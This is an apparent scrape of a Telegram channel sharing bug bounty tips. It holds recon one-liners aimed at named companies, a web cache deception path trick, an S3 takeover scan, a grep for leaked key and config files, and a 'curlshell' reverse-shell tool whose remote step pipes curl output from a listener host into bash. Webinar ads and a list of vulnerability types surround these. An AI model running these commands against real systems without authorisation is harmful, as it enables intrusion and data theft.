Bug bounty Tips
رفتن به کانال در Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
نمایش بیشتر5 855
مشترکین
+624 ساعت
+707 روز
+36030 روز
آرشیو پست ها
5 856
Hey! After a long break, i am back with some BugBounty notes, on reconnaissance with the list of tools and Its technique.
https://book.cipherops.tech/bug-bounty-notes/series-on-the-power-of-reconnaissance-tools
5 856
Fingerprinting with Shodan and Nuclei engine:
> shodan domain tesla.com | awk '{print $3}' | httpx -silent | nuclei
> shodan domain tesla.com | awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
> shodan search org:"google" --fields ip_str,port --separator " " | awk '{print $1":"$2}'
#bugbounty #bugbountytips5 856
Repost from #bugbountytips
Иногда, если ответ «404 Not found», Akamai кэширует ответ менее чем на 10 секунд, что усложняет задачу. В этом случае злоумышленник должен быть быстрым. Однако, если Akamai обнаружит ответ 200 OK, он будет храниться не менее 24 часов.
Совет:
В некоторых приложениях, если вы добавите точку с запятой (;) перед расширением, это может дать вам ответ 200 OK.
Например
/xxxx/xxxxxx/;.js?test /xxxx/xxxxxx/;.css?testили (обход 403 при попытке закешировать)
/xxxx/xxxxxx/;%2ejs?test /xxxx/xxxxxx/;%2ecss?testМы получим HTTP/2 200 ОК и сохраним ответ в кэш на 24 часа.
5 856
curlshell
reverse shell using curl
*
usage:
*
Start your listener:
./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234
On the remote side:
curl https://curlshell:1234 | bash
download
#shell #curl
5 856
#bugbountytips
Scan for s3 bucket takeover vulnerabilities
> subfinder -d hackerone.com -silent | httpx -silent | gospider -d 5 --sitemap --robots -w -r --subs | grep "\[aws-s3" | sed 's/\[aws-s3\] - //g' | httpx -silent -mr "NoSuchBucket" | tee s3-bucket-takeover.txt
5 856
#bugbountytips
1. Finding More IDORs – Tips And Tricks ($100/Day)
2. How-i-found-XSS-on-admin-page-without-login?
3. Reconnaissance to Remote Code Execution
4. How I get +10 SQLi and +30 XSS via Automation Tool?
5. IDOR is Everywhere 😁
6. $300 for Reporting an Unexpected Bug
7. How I hacked one of the biggest airlines group in the world?
8. International company customer PII INFO by AWS metadata access through SSRF
9. I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection
10. I got owned a Multi-Billion Dollar Retailer’s MySQL using SQL Injection
5 856
Guys check out this training and internship program if anyone intrested in do register the for below link. https://forms.gle/vr77U7P5REZdDPB37
5 856
Check out this guy's we have update our training and internship program on our official website. ➡️Cipherops.tech
5 856
If anyone intrested in joining the webinar, do join at sharp 6 PM
Webinar link for “unlocking the secrets of Bug Bounty”
meet.google.com/rbp-bwsh-mbb
5 856
#bugbountytips
( 1/2 )
otx.alienvault.com/indicator/domain/{{domain.com}}
on tap Associated Urls ==> show as 100 entries
( 2/2 )
> gau domain.com --subs -o 1234.txt
> grep -E '\.(pdf|docx|txt|xlsx|zip|rar|7z|tar|gz|tar.gz|bak|sql|log|key|pem|cfg|conf|ini|env|sh)' 1234.txt
5 856
100 web vulnerabilities, categorized into various types:
Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass
Server-Side Request Forgery (SSRF):
87. Blind SSRF
88. Time-Based Blind SSRF
Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass
Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws
Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
By @TheGodEye
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
